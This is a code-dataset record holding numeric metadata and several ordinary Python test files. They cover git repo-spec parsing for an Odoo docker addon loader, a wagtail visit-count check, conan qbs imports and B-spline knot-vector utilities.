| 0
| 0
| 0
| 1
| 0.026087
| false
| 0.008696
| 0.026087
| 0
| 0.078261
| 0.008696
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa372bcc97f282a341e70035b04fff00322e29f4
| 8,029
|
py
|
Python
|
auto_addons/tests.py
|
jmartinezespza/odoo-docker
|
288064e879c2a3910197c8b91473358e0bb25928
|
[
"MIT"
] | null | null | null |
auto_addons/tests.py
|
jmartinezespza/odoo-docker
|
288064e879c2a3910197c8b91473358e0bb25928
|
[
"MIT"
] | null | null | null |
auto_addons/tests.py
|
jmartinezespza/odoo-docker
|
288064e879c2a3910197c8b91473358e0bb25928
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2015 Elico Corp
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import unittest
from addons import *
class RepoTest(unittest.TestCase):
def test_check_is_url(self):
remote_url = 'connector'
self.repo = Repo(remote_url)
self.assertTrue(self.repo._check_is_url('https://github.com'))
self.assertTrue(self.repo._check_is_url('http://github.com'))
self.assertFalse(self.repo._check_is_url('ttps://github.com'))
def test_parse_oca_repo(self):
remote_url = 'connector'
self.repo = Repo(remote_url)
self.repo._parse_organization_repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.folder_name, 'connector')
def test_parse_organization_and_repo(self):
remote_url = 'OCA/connector'
self.repo = Repo(remote_url)
self.repo._parse_organization_repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.folder_name, 'connector')
def test_parse_url(self):
remote_url = 'https://github.com/OCA/connector'
self.repo = Repo(remote_url)
self.repo._parse_url(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.folder_name, 'connector')
self.assertEquals(self.repo.git_repo_host, 'github.com')
def test_path(self):
remote_url = 'connector'
self.repo = Repo(remote_url)
self.assertEquals(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_oca_repo(self):
remote_url = 'connector'
self.repo = Repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.folder_name, 'connector')
self.assertEquals(self.repo.branch, None)
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.git_repo_host, 'github.com')
self.assertEquals(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_organization_and_repo(self):
remote_url = 'OCA/connector'
self.repo = Repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.folder_name, 'connector')
self.assertEquals(self.repo.branch, None)
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.git_repo_host, 'github.com')
self.assertEquals(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_url(self):
remote_url = 'https://github.com/OCA/connector'
self.repo = Repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.folder_name, 'connector')
self.assertEquals(self.repo.branch, None)
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.git_repo_host, 'github.com')
self.assertEquals(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_oca_repo_and_branch(self):
remote_url = 'connector 8.0'
self.repo = Repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.folder_name, 'connector')
self.assertEquals(self.repo.branch, '8.0')
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.git_repo_host, 'github.com')
self.assertEquals(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_organization_and_repo_and_branch(self):
remote_url = 'OCA/connector 8.0'
self.repo = Repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.folder_name, 'connector')
self.assertEquals(self.repo.branch, '8.0')
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.git_repo_host, 'github.com')
self.assertEquals(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_url_and_branch(self):
remote_url = 'https://github.com/OCA/connector 8.0'
self.repo = Repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.folder_name, 'connector')
self.assertEquals(self.repo.branch, '8.0')
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.git_repo_host, 'github.com')
self.assertEquals(self.repo.path, '%sconnector' % (EXTRA_ADDONS_PATH, ))
def test_repo_rename_and_url(self):
remote_url = 'connector_rename https://github.com/OCA/connector'
self.repo = Repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.folder_name, 'connector_rename')
self.assertEquals(self.repo.branch, None)
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.git_repo_host, 'github.com')
self.assertEquals(self.repo.path, '%sconnector_rename' % (EXTRA_ADDONS_PATH, ))
def test_repo_rename_and_url_and_branch(self):
remote_url = 'connector_rename https://github.com/OCA/connector 8.0'
self.repo = Repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.folder_name, 'connector_rename')
self.assertEquals(self.repo.branch, '8.0')
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'connector')
self.assertEquals(self.repo.git_repo_host, 'github.com')
self.assertEquals(self.repo.path, '%sconnector_rename' % (EXTRA_ADDONS_PATH, ))
def test_repo_rename_and_url_and_branch_new(self):
remote_url = 'account-financial-reporting https://github.com/OCA/account-financial-reporting 8.0'
self.repo = Repo(remote_url)
self.assertEquals(self.repo.remote_url, remote_url)
self.assertEquals(self.repo.folder_name, 'account-financial-reporting')
self.assertEquals(self.repo.branch, '8.0')
self.assertEquals(self.repo.organization, DEFAULT_ORGANIZATION)
self.assertEquals(self.repo.repository, 'account-financial-reporting')
self.assertEquals(self.repo.git_repo_host, 'github.com')
self.assertEquals(self.repo.path, '%saccount-financial-reporting' % (EXTRA_ADDONS_PATH, ))
def test_download_cmd(self):
repo = Repo('Elico-Corp/odoo')
self.assertEqual(
['git', 'clone',
'https://github.com/Elico-Corp/odoo.git',
'/mnt/data/additional_addons/odoo'],
repo.download_cmd)
def test_download_cmd_with_branch(self):
repo = Repo('Elico-Corp/odoo 8.0')
self.assertEqual(
['git', 'clone', '-b', '8.0',
'https://github.com/Elico-Corp/odoo.git',
'/mnt/data/additional_addons/odoo'],
repo.download_cmd)
if __name__ == '__main__':
unittest.main()
| 48.077844
| 105
| 0.692863
| 987
| 8,029
| 5.419453
| 0.074975
| 0.148065
| 0.287904
| 0.345485
| 0.916059
| 0.90802
| 0.888764
| 0.867639
| 0.865208
| 0.862965
| 0
| 0.004727
| 0.183211
| 8,029
| 166
| 106
| 48.36747
| 0.810918
| 0.013576
| 0
| 0.736111
| 0
| 0.006944
| 0.145781
| 0.021981
| 0
| 0
| 0
| 0
| 0.569444
| 1
| 0.111111
| false
| 0
| 0.013889
| 0
| 0.131944
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a4d7d60fb8beb501b8ba03ee0c2e9f84dc57af38
| 680
|
py
|
Python
|
tests/unit/test_rules_visitcount.py
|
torchbox/wagtail-personalisation
|
fdc2b971943cd24dca2d325604e35b56b5858d0d
|
[
"MIT"
] | 1
|
2020-04-25T06:23:02.000Z
|
2020-04-25T06:23:02.000Z
|
tests/unit/test_rules_visitcount.py
|
torchbox/wagtail-personalisation
|
fdc2b971943cd24dca2d325604e35b56b5858d0d
|
[
"MIT"
] | 3
|
2017-10-20T11:29:42.000Z
|
2019-09-26T07:38:05.000Z
|
tests/unit/test_rules_visitcount.py
|
torchbox/wagtail-personalisation
|
fdc2b971943cd24dca2d325604e35b56b5858d0d
|
[
"MIT"
] | 1
|
2017-11-09T08:30:28.000Z
|
2017-11-09T08:30:28.000Z
|
import pytest
@pytest.mark.django_db
def test_visit_count(site, client):
response = client.get('/')
assert response.status_code == 200
visit_count = client.session['visit_count']
assert visit_count[0]['path'] == '/'
assert visit_count[0]['count'] == 1
response = client.get('/')
assert response.status_code == 200
visit_count = client.session['visit_count']
assert visit_count[0]['path'] == '/'
assert visit_count[0]['count'] == 2
response = client.get('/page-1/')
assert response.status_code == 200
visit_count = client.session['visit_count']
assert visit_count[0]['count'] == 2
assert visit_count[1]['count'] == 1
| 29.565217
| 47
| 0.654412
| 90
| 680
| 4.744444
| 0.255556
| 0.30445
| 0.224824
| 0.199063
| 0.758782
| 0.758782
| 0.742389
| 0.742389
| 0.742389
| 0.742389
| 0
| 0.035971
| 0.182353
| 680
| 22
| 48
| 30.909091
| 0.732014
| 0
| 0
| 0.666667
| 0
| 0
| 0.107353
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
102e73a682e3f41acc7ebd5562cc5604ffd36615
| 90
|
py
|
Python
|
conan/tools/qbs/__init__.py
|
Erlkoenig90/conan
|
da8de69618d75da5ac7d77e0eb7a38ee4d564eb9
|
[
"MIT"
] | null | null | null |
conan/tools/qbs/__init__.py
|
Erlkoenig90/conan
|
da8de69618d75da5ac7d77e0eb7a38ee4d564eb9
|
[
"MIT"
] | null | null | null |
conan/tools/qbs/__init__.py
|
Erlkoenig90/conan
|
da8de69618d75da5ac7d77e0eb7a38ee4d564eb9
|
[
"MIT"
] | null | null | null |
from conan.tools.qbs.qbstoolchain import QbsToolchain
from conan.tools.qbs.qbs import Qbs
| 30
| 53
| 0.844444
| 14
| 90
| 5.428571
| 0.428571
| 0.236842
| 0.368421
| 0.447368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 90
| 2
| 54
| 45
| 0.926829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
107a68f8e23fb7c1bfcb5d122e2cfd58856b79cd
| 15,529
|
py
|
Python
|
tests/test_SplineUsefulFunctions.py
|
carlos-adir/FEM-Nurbs
|
0c63d736fe6b49b0aec3f0a63573548eae8b65f2
|
[
"MIT"
] | null | null | null |
tests/test_SplineUsefulFunctions.py
|
carlos-adir/FEM-Nurbs
|
0c63d736fe6b49b0aec3f0a63573548eae8b65f2
|
[
"MIT"
] | null | null | null |
tests/test_SplineUsefulFunctions.py
|
carlos-adir/FEM-Nurbs
|
0c63d736fe6b49b0aec3f0a63573548eae8b65f2
|
[
"MIT"
] | null | null | null |
import pytest
# import unittest
import numpy as np
import femnurbs.SplineUsefulFunctions as SUF
def test_isValidU():
with pytest.raises(TypeError):
SUF.isValidU()
assert SUF.isValidU(0) is False
assert SUF.isValidU(1.2) is False
assert SUF.isValidU({}) is False
assert SUF.isValidU(-1) is False
assert SUF.isValidU({1: 1}) is False
assert SUF.isValidU([0, 0, 0, 1, 1]) is False
assert SUF.isValidU([0, 0, 1, 1, 1, ]) is False
assert SUF.isValidU([0, 0, 0, 0, 1, 1, 1]) is False
assert SUF.isValidU([0, 0, 0, 1, 1, 1, 1]) is False
assert SUF.isValidU([-1, -1, 1, 1]) is False
assert SUF.isValidU([0, 0, 2, 2]) is False
assert SUF.isValidU([0, 0, 0.8, 0.2, 1, 1]) is False
assert SUF.isValidU([0, 0, 0, 1, 0.5, 1, 1]) is False
assert SUF.isValidU([0, 0, 1, 1]) is True
assert SUF.isValidU([0, 0, 0, 1, 1, 1]) is True
assert SUF.isValidU([0, 0, 0, 0, 1, 1, 1, 1]) is True
assert SUF.isValidU([0, 0, 0.2, 0.8, 1, 1]) is True
assert SUF.isValidU([0, 0, 0, 0.5, 1, 1, 1]) is True
assert SUF.isValidU([0, 0, 0.1, 0.5, 0.9, 1, 1]) is True
assert SUF.isValidU([0, 0, 0.5, 0.5, 1, 1]) is True
assert SUF.isValidU([0, 0, 0.5, 0.5, 0.5, 1, 1]) is False
def test_UBezier():
for p in range(1, 10):
assert SUF.isValidU(SUF.UBezier(p=p)) is True
Ugood = np.array([0, 0, 1, 1])
Utest = SUF.UBezier(p=1)
np.testing.assert_almost_equal(Ugood, Utest)
Ugood = np.array([0, 0, 0, 1, 1, 1])
Utest = SUF.UBezier(p=2)
np.testing.assert_almost_equal(Ugood, Utest)
Ugood = np.array([0, 0, 0, 0, 1, 1, 1, 1])
Utest = SUF.UBezier(p=3)
np.testing.assert_almost_equal(Ugood, Utest)
def test_UUniform():
for p in range(1, 10):
for n in range(p + 1, 11):
assert SUF.isValidU(SUF.UUniform(p=p, n=n)) is True
Ugood = np.array([0, 0, 1, 1])
Utest = SUF.UUniform(p=1, n=2)
np.testing.assert_almost_equal(Ugood, Utest)
Ugood = np.array([0, 0, 0.5, 1, 1])
Utest = SUF.UUniform(p=1, n=3)
np.testing.assert_almost_equal(Ugood, Utest)
Ugood = np.array([0, 0, 0.25, 0.5, 0.75, 1, 1])
Utest = SUF.UUniform(p=1, n=5)
np.testing.assert_almost_equal(Ugood, Utest)
Ugood = np.array([0, 0, 0.2, 0.4, 0.6, 0.8, 1, 1])
Utest = SUF.UUniform(p=1, n=6)
np.testing.assert_almost_equal(Ugood, Utest)
Ugood = np.array([0, 0, 0, 1, 1, 1])
Utest = SUF.UUniform(p=2, n=3)
np.testing.assert_almost_equal(Ugood, Utest)
Ugood = np.array([0, 0, 0, 0.5, 1, 1, 1])
Utest = SUF.UUniform(p=2, n=4)
np.testing.assert_almost_equal(Ugood, Utest)
Ugood = np.array([0, 0, 0, 0.25, 0.5, 0.75, 1, 1, 1])
Utest = SUF.UUniform(p=2, n=6)
np.testing.assert_almost_equal(Ugood, Utest)
Ugood = np.array([0, 0, 0, 0.2, 0.4, 0.6, 0.8, 1, 1, 1])
Utest = SUF.UUniform(p=2, n=7)
np.testing.assert_almost_equal(Ugood, Utest)
Ugood = np.array([0, 0, 0, 0, 1, 1, 1, 1])
Utest = SUF.UUniform(p=3, n=4)
np.testing.assert_almost_equal(Ugood, Utest)
Ugood = np.array([0, 0, 0, 0, 0.5, 1, 1, 1, 1])
Utest = SUF.UUniform(p=3, n=5)
np.testing.assert_almost_equal(Ugood, Utest)
Ugood = np.array([0, 0, 0, 0, 0.25, 0.5, 0.75, 1, 1, 1, 1])
Utest = SUF.UUniform(p=3, n=7)
np.testing.assert_almost_equal(Ugood, Utest)
Ugood = np.array([0, 0, 0, 0, 0.2, 0.4, 0.6, 0.8, 1, 1, 1, 1])
Utest = SUF.UUniform(p=3, n=8)
np.testing.assert_almost_equal(Ugood, Utest)
def test_URandom():
Ntest = 100
for p in (1, 2, 3):
for n in range(p + 1, 30):
for zz in range(Ntest):
U = SUF.URandom(p=p, n=n)
assert SUF.isValidU(U) is True
assert SUF.getPfromU(U) == p
assert SUF.getNfromU(U) == n
def test_transpose():
II = np.eye(3)
IItest = SUF.transpose(II)
np.testing.assert_almost_equal(IItest, II)
II = np.eye(4)
IItest = SUF.transpose(II)
np.testing.assert_almost_equal(IItest, II)
II = np.eye(3)
IItest = SUF.transpose(II, diagonal=2)
np.testing.assert_almost_equal(IItest, II)
II = np.eye(4)
IItest = SUF.transpose(II, diagonal=2)
np.testing.assert_almost_equal(IItest, II)
def test_isSymetric():
II = np.eye(3)
assert SUF.isSymetric(II) is True
II = np.eye(4)
assert SUF.isSymetric(II) is True
II = np.eye(3)
assert SUF.isSymetric(II, diagonal=2) is True
II = np.eye(4)
assert SUF.isSymetric(II, diagonal=2) is True
II = np.array([[1, 2, 3, 4],
[4, 3, 2, 1]])
assert SUF.isSymetric(II, diagonal=2) is True
II = np.array([[1, 2, 4, 4],
[4, 4, 2, 1]])
assert SUF.isSymetric(II, diagonal=2) is True
II = np.array([[7, 2, 4, 3],
[4, 4, 2, 7]])
assert SUF.isSymetric(II, diagonal=2) is False
II = np.array([[7, 2, 4, 7],
[7, 4, 2, 3]])
assert SUF.isSymetric(II, diagonal=2) is False
def test_getPfromU():
U = SUF.UBezier(p=1)
ptest = SUF.getPfromU(U)
assert ptest == 1
U = SUF.UBezier(p=2)
ptest = SUF.getPfromU(U)
assert ptest == 2
U = SUF.UBezier(p=3)
ptest = SUF.getPfromU(U)
assert ptest == 3
U = SUF.UBezier(p=4)
ptest = SUF.getPfromU(U)
assert ptest == 4
U = SUF.UUniform(p=1, n=6)
ptest = SUF.getPfromU(U)
assert ptest == 1
U = SUF.UUniform(p=2, n=6)
ptest = SUF.getPfromU(U)
assert ptest == 2
U = SUF.UUniform(p=3, n=6)
ptest = SUF.getPfromU(U)
assert ptest == 3
U = SUF.UUniform(p=4, n=6)
ptest = SUF.getPfromU(U)
assert ptest == 4
U = np.array([0, 0, 0, 0.2, 0.8, 1, 1, 1])
ptest = SUF.getPfromU(U)
assert ptest == 2
def test_getNfromU():
U = SUF.UBezier(p=1)
ptest = SUF.getNfromU(U)
assert ptest == 2
U = SUF.UBezier(p=2)
ptest = SUF.getNfromU(U)
assert ptest == 3
U = SUF.UBezier(p=3)
ptest = SUF.getNfromU(U)
assert ptest == 4
U = SUF.UBezier(p=4)
ptest = SUF.getNfromU(U)
assert ptest == 5
U = SUF.UUniform(p=1, n=6)
ptest = SUF.getNfromU(U)
assert ptest == 6
U = SUF.UUniform(p=2, n=6)
ptest = SUF.getNfromU(U)
assert ptest == 6
U = SUF.UUniform(p=3, n=6)
ptest = SUF.getNfromU(U)
assert ptest == 6
U = SUF.UUniform(p=4, n=6)
ptest = SUF.getNfromU(U)
assert ptest == 6
U = np.array([0, 0, 0, 0.2, 0.8, 1, 1, 1])
ptest = SUF.getNfromU(U)
assert ptest == 5
def test_transformUtoH():
U = SUF.UBezier(p=1)
Hgood = np.array([1])
Htest = SUF.transformUtoH(U)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UBezier(p=2)
Hgood = np.array([0, 1, 0])
Htest = SUF.transformUtoH(U)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UBezier(p=3)
Hgood = np.array([0, 0, 1, 0, 0])
Htest = SUF.transformUtoH(U)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UBezier(p=4)
Hgood = np.array([0, 0, 0, 1, 0, 0, 0])
Htest = SUF.transformUtoH(U)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=1, n=6)
Hgood = np.array([0.2, 0.2, 0.2, 0.2, 0.2])
Htest = SUF.transformUtoH(U)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=2, n=6)
Hgood = np.array([0, 0.25, 0.25, 0.25, 0.25, 0])
Htest = SUF.transformUtoH(U)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=3, n=6)
Hgood = np.array([0, 0, 1, 1, 1, 0, 0]) / 3
Htest = SUF.transformUtoH(U)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=4, n=6)
Hgood = np.array([0, 0, 0, 1, 1, 0, 0, 0]) / 2
Htest = SUF.transformUtoH(U)
np.testing.assert_almost_equal(Hgood, Htest)
U = np.array([0, 0, 0, 0.2, 0.8, 1, 1, 1]) # p = 2 and n = 5
Hgood = np.array([0, 0.2, 0.6, 0.2, 0])
Htest = SUF.transformUtoH(U)
np.testing.assert_almost_equal(Hgood, Htest)
U = np.array([0, 0, 0, 0, 0.2, 0.8, 1, 1, 1, 1]) # p = 3 and n = 6
Hgood = np.array([0, 0, 0.2, 0.6, 0.2, 0, 0])
Htest = SUF.transformUtoH(U)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UBezier(p=2)
Hgood = np.array([1])
Htest = SUF.transformUtoH(U, j=0)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UBezier(p=2)
Hgood = np.array([1])
Htest = SUF.transformUtoH(U, j=1)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UBezier(p=3)
Hgood = np.array([1])
Htest = SUF.transformUtoH(U, j=0)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UBezier(p=3)
Hgood = np.array([1])
Htest = SUF.transformUtoH(U, j=1)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UBezier(p=3)
Hgood = np.array([0, 1, 0])
Htest = SUF.transformUtoH(U, j=2)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UBezier(p=4)
Hgood = np.array([1])
Htest = SUF.transformUtoH(U, j=0)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UBezier(p=4)
Hgood = np.array([1])
Htest = SUF.transformUtoH(U, j=1)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UBezier(p=4)
Hgood = np.array([0, 1, 0])
Htest = SUF.transformUtoH(U, j=2)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UBezier(p=4)
Hgood = np.array([0, 0, 1, 0, 0])
Htest = SUF.transformUtoH(U, j=3)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=1, n=6)
Hgood = np.array([0.2, 0.2, 0.2, 0.2, 0.2])
Htest = SUF.transformUtoH(U, j=0)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=2, n=6)
Hgood = np.array([0.25, 0.25, 0.25, 0.25])
Htest = SUF.transformUtoH(U, j=0)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=2, n=6)
Hgood = np.array([0.25, 0.25, 0.25, 0.25])
Htest = SUF.transformUtoH(U, j=1)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=3, n=6)
Hgood = np.array([1, 1, 1]) / 3
Htest = SUF.transformUtoH(U, j=0)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=3, n=6)
Hgood = np.array([1, 1, 1]) / 3
Htest = SUF.transformUtoH(U, j=1)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=3, n=6)
Hgood = np.array([0, 1, 1, 1, 0]) / 3
Htest = SUF.transformUtoH(U, j=2)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=4, n=6)
Hgood = np.array([1, 1]) / 2
Htest = SUF.transformUtoH(U, j=0)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=4, n=6)
Hgood = np.array([1, 1]) / 2
Htest = SUF.transformUtoH(U, j=1)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=4, n=6)
Hgood = np.array([0, 1, 1, 0]) / 2
Htest = SUF.transformUtoH(U, j=2)
np.testing.assert_almost_equal(Hgood, Htest)
U = SUF.UUniform(p=4, n=6)
Hgood = np.array([0, 0, 1, 1, 0, 0]) / 2
Htest = SUF.transformUtoH(U, j=3)
np.testing.assert_almost_equal(Hgood, Htest)
U = np.array([0, 0, 0, 0.2, 0.8, 1, 1, 1]) # p = 2 and n = 5
Hgood = np.array([0.2, 0.6, 0.2])
Htest = SUF.transformUtoH(U, j=1)
np.testing.assert_almost_equal(Hgood, Htest)
U = np.array([0, 0, 0, 0, 0.2, 0.8, 1, 1, 1, 1]) # p = 3 and n = 6
Hgood = np.array([0.2, 0.6, 0.2])
Htest = SUF.transformUtoH(U, j=1)
np.testing.assert_almost_equal(Hgood, Htest)
U = np.array([0, 0, 0, 0, 0.2, 0.8, 1, 1, 1, 1]) # p = 3 and n = 6
Hgood = np.array([0, 0.2, 0.6, 0.2, 0])
Htest = SUF.transformUtoH(U, j=2)
np.testing.assert_almost_equal(Hgood, Htest)
def test_transformHtoSides():
H = np.array([1, 1, 1])
Sgood = np.array([[1], [1]])
Stest = SUF.transformHtoSides(H)
np.testing.assert_almost_equal(Sgood, Stest)
H = np.array([0, 1, 1])
Sgood = np.array([[0], [1]])
Stest = SUF.transformHtoSides(H)
np.testing.assert_almost_equal(Sgood, Stest)
H = np.array([1, 1, 0])
Sgood = np.array([[1], [0]])
Stest = SUF.transformHtoSides(H)
np.testing.assert_almost_equal(Sgood, Stest)
H = np.array([0, 1, 0])
Sgood = np.array([[0], [0]])
Stest = SUF.transformHtoSides(H)
np.testing.assert_almost_equal(Sgood, Stest)
H = np.array([0.6, 1, 0.3])
Sgood = np.array([[0.6], [0.3]])
Stest = SUF.transformHtoSides(H)
np.testing.assert_almost_equal(Sgood, Stest)
H = np.array([6, 10, 3])
Sgood = np.array([[0.6], [0.3]])
Stest = SUF.transformHtoSides(H)
np.testing.assert_almost_equal(Sgood, Stest)
H = np.array([1, 1, 1, 1, 1])
Sgood = np.array([[1, 1], [1, 1]])
Stest = SUF.transformHtoSides(H)
np.testing.assert_almost_equal(Sgood, Stest)
H = np.array([0, 1, 1, 1, 1])
Sgood = np.array([[1, 0], [1, 1]])
Stest = SUF.transformHtoSides(H)
np.testing.assert_almost_equal(Sgood, Stest)
H = np.array([1, 1, 1, 1, 0])
Sgood = np.array([[1, 1], [1, 0]])
Stest = SUF.transformHtoSides(H)
np.testing.assert_almost_equal(Sgood, Stest)
H = np.array([0, 0, 1, 0, 0])
Sgood = np.array([[0, 0], [0, 0]])
Stest = SUF.transformHtoSides(H)
np.testing.assert_almost_equal(Sgood, Stest)
H = np.array([0.2, 0.6, 1, 0.3, 0.4])
Sgood = np.array([[0.6, 0.2], [0.3, 0.4]])
Stest = SUF.transformHtoSides(H)
np.testing.assert_almost_equal(Sgood, Stest)
H = np.array([2, 6, 10, 3, 4])
Sgood = np.array([[0.6, 0.2], [0.3, 0.4]])
Stest = SUF.transformHtoSides(H)
np.testing.assert_almost_equal(Sgood, Stest)
def test_cutHtoElementZ():
H = np.array([0.5, 0.5])
Zgood = np.array([0.5])
Ztest = SUF.cutHtoElementZ(H, 0)
np.testing.assert_almost_equal(Zgood, Ztest)
H = np.array([0.5, 0.5])
Zgood = np.array([0.5])
Ztest = SUF.cutHtoElementZ(H, 1)
np.testing.assert_almost_equal(Zgood, Ztest)
H = np.array([0, 0.5, 0.5, 0])
Zgood = np.array([0, 0.5, 0.5])
Ztest = SUF.cutHtoElementZ(H, 0)
np.testing.assert_almost_equal(Zgood, Ztest)
H = np.array([0, 0.5, 0.5, 0])
Zgood = np.array([0.5, 0.5, 0])
Ztest = SUF.cutHtoElementZ(H, 1)
np.testing.assert_almost_equal(Zgood, Ztest)
H = np.array([0, 0, 0.5, 0.5, 0, 0])
Zgood = np.array([0, 0, 0.5, 0.5, 0])
Ztest = SUF.cutHtoElementZ(H, 0)
np.testing.assert_almost_equal(Zgood, Ztest)
H = np.array([0, 0, 0.5, 0.5, 0, 0])
Zgood = np.array([0, 0.5, 0.5, 0, 0])
Ztest = SUF.cutHtoElementZ(H, 1)
np.testing.assert_almost_equal(Zgood, Ztest)
def test_isDiagonalDominant():
M = np.eye(3)
assert SUF.isDiagonalDominant(M) is True
M = np.ones((3, 3))
assert SUF.isDiagonalDominant(M) is False
M = np.zeros((3, 3))
assert SUF.isDiagonalDominant(M) is False
M = np.eye(3) - (1 / 3)
assert SUF.isDiagonalDominant(M) is False
M = 1.0001 * np.eye(3) - (1 / 3)
assert SUF.isDiagonalDominant(M) is True
# def main():
# unittest.main()
# if __name__ == "__main__":
# main()
| 29.749042
| 72
| 0.567905
| 2,638
| 15,529
| 3.283169
| 0.030705
| 0.030943
| 0.119501
| 0.167302
| 0.93107
| 0.926452
| 0.899319
| 0.869184
| 0.820113
| 0.76042
| 0
| 0.079512
| 0.261382
| 15,529
| 521
| 73
| 29.806142
| 0.675588
| 0.010625
| 0
| 0.69898
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.321429
| 1
| 0.030612
| false
| 0
| 0.007653
| 0
| 0.038265
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
